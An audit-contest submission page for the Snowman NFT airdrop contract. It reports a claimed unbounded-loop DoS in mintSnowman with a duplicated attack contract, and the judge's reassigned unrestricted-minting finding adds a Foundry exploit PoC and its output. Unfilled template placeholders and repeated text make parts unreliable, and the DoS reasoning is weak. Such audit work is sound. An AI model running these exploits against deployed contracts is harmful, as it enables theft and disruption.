Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Snowman.sol Unbounded Loop DoS Attack in mintSnowman Function

Root + Impact

Description

  • Describe the normal behavior in one or more sentences

  • The loop is not supposed to exist


  • Explain the specific issue or problem in one or more sentences

  • The mintSnowman function contains an unbounded loop that iterates based on user-supplied input without any upper limit validation. An attacker can call this function with an extremely large amount value (e.g., type(uint256).max),

// Root cause in the codebase with @> marks to highlight the relevant section
// Attack contract
contract DoSAttack {
Snowman public snowman;
constructor(address _snowman) {
snowman = Snowman(_snowman);
}
function attack() external {
// This will consume all gas and likely revert
// But still wastes block space and gas
snowman.mintSnowman(address(this), type(uint256).max);
}
function blockStuffing() external {
// Attacker can also stuff blocks with multiple high-gas transactions
for(uint i = 0; i < 10; i++) {
snowman.mintSnowman(address(this), 10000);
}
}

Risk

Likelihood:

  • Reason 1

  • Attackers can cause denial of service by forcing transactions to consume all available block gas, preventing legitimate users from minting NFTs. Additionally, attackers can grief users by making them waste ETH on failed transactions that run out of gas. In extreme cases, if the amount is set to a very high value, the function becomes permanently unusable.

  • Reason 2

Impact:

  • Impact 1

  • Attackers can cause denial of service by forcing transactions to consume all available block gas, preventing legitimate users from minting NFTs. Additionally, attackers can grief users by making them waste ETH on failed transactions that run out of gas. In extreme cases, if the amount is set to a very high value, the function becomes permanently unusable.

  • Impact 2

Proof of Concept

/ Attack contract
contract DoSAttack {
Snowman public snowman;
constructor(address _snowman) {
snowman = Snowman(_snowman);
}
function attack() external {
// This will consume all gas and likely revert
// But still wastes block space and gas
snowman.mintSnowman(address(this), type(uint256).max);
}
function blockStuffing() external {
// Attacker can also stuff blocks with multiple high-gas transactions
for(uint i = 0; i < 10; i++) {
snowman.mintSnowman(address(this), 10000);
}
}

Recommended Mitigation

- remove this code
+ add this codeuint256 public constant MAX_MINT_PER_TX = 100; // Reasonable limit
function mintSnowman(address receiver, uint256 amount) external {
require(amount > 0 && amount <= MAX_MINT_PER_TX, "Invalid mint amount");
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 7 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!